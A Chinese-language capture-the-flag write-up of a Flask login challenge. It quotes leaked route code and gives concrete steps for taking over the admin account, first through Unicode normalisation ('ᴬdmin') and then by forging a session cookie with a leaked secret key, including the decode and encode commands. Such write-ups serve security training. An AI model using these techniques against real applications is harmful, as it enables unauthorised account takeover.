0x00
题目类型:unicode欺骗,源码泄露,session伪造,条件竞争(Maybe)。
0x01
题目索引界面有登录与注册两个功能,查看源码注释中有you are not admin字样,可能要求以admin身份登陆。先注册一个账号,看看有没有有用的信息。
在改密码的界面发现源码泄漏,去github看源码。源码较长,截取关键部分。
@app.route('/register', methods = ['GET', 'POST'])
def register():
if current_user.is_authenticated:
return redirect(url_for('index'))
form = RegisterForm()
if request.method == 'POST':
name = strlower(form.username.data)
if session.get('image').lower() != form.verify_code.data.lower():
flash('Wrong verify code.')
return render_template('register.html', title = 'register', form=form)
if User.query.filter_by(username = name).first():
flash('The username has been registered')
return redirect(url_for('register'))
user = User(username=name)
user.set_password(form.password.data)
db.session.add(user)
db.session.commit()
flash('register successful')
return redirect(url_for('login'))
return render_template('register.html', title = 'register', form = form)
@app.route('/change', methods = ['GET', 'POST'])
def change():
if not current_user.is_authenticated:
return redirect(url_for('login'))
form = NewpasswordForm()
if request.method == 'POST':
name = strlower(session['name'])
user = User.query.filter_by(username=name).first()
user.set_password(form.newpassword.data)
db.session.commit()
flash('change successful')
return redirect(url_for('index'))
return render_template('change.html', title = 'change', form = form)
@app.errorhandler(404)
def page_not_found(error):
title = unicode(error)
message = error.description
return render_template('errors.html', title=title, message=message)
def strlower(username):
username = nodeprep.prepare(username)
return username
在注册与改密码两条路由下,发现都对用户名经过了strlower()函数处理,不过python有内置的lower函数,这里可能有问题。发现使用了nodeprep.prepare这个库,这个库的老版本是有一些问题的,比如unicode编码的“ᴬ”经过strlower后会被转义为标准的“A”,而后改密码时再进行strlower操作时,会被转变为“a”,这样就可以使用“admin”身份登陆了。同时发现session中没有特殊处理,可以伪造,稍后再详细分析。
0x02
Unicode欺骗:
注册一个名为“ᴬdmin”的账号,登陆进去修改密码,然后直接以admin身份登陆拿到flag。
tips:https://unicode-table.com/en/#1D2Cunicode编码在这个网站可查。
session伪造:
首先了解一点flask的知识,flask的session存储在客户端中,用burp抓包的话可以发现session直接出现在了http头中,并且session只做了签名处理但没有加密。这意味着我们可以读取session信息,如果知道密钥的话还可以伪造session。恰巧在github的config.py源码中,可以找到密钥。
在github上下载flask-cookie-session-manager这个脚本,首先解密session。
py .\flask_session_cookie_manager3.py -s "ckj123" -c ".eJw9UMGKg0AM_ZUlZw91rBehBxetbGFGLLaSXIpbrTqjXdCWLlP67xtd6OGRR154L8kTTpexnloIbuO9duDUVRA84eMbAlARGZXED9R7Qwk-SFcdRUetoqqlIfNUcfAxp04J6qTY9pg3Pg5SyDxbSY0iLTKBed9THnvK7nu0oUUR-2mS-VIoTcORNbRov9aoyaBtXGRPdvAokS5a0jLfGdShIL3VpGNXih33wrW0xmM80uJosMANvBw4T-PldPsx9fV9whIffc4xHHH2eZUVR_zyykZZ5rbxuYr5rLRQPBtaGW4Wu24om_rtVNpWHLJ_5VoOLMB9qscZ4Cx0eR24Lrz-ADhrbeA.Xwqjfw.0C9xgDXHd6DtNUBvcBG4JqJsu9Y"
#这是解密语法
{'_fresh': True, '_id': b'46d4a0b4ddf0f7bd5c47afd75e9a6b7fb3aea89bc61442669d6a9ee1774ec03ca98d93ccfeee63c28b6dc85ae93c7dc5c6c12db06f1cf153bc1083973909edaf', 'csrf_token': b'a9ed0ee68b79e14ae17fd714c89716d5c9ced030', 'image': b'k8vQ', 'name': 'useruser', 'user_id': '11'}
#这是解密信息
然后将name改为“admin”,再用脚本生成session,burp重放即可。
py .\flask_session_cookie_manager3.py encode -s "ckj123" -t "{'_fresh': True, '_id': b'46d4a0b4ddf0f7bd5c47afd75e9a6b7fb3aea89bc61442669d6a9ee1774ec03ca98d93ccfeee63c28b6dc85ae93c7dc5c6c12db06f1cf153bc1083973909edaf', 'csrf_token': b'a9ed0ee68b79e14ae17fd714c89716d5c9ced030', 'image': b'k8vQ', 'name': 'admin', 'user_id': '11'}"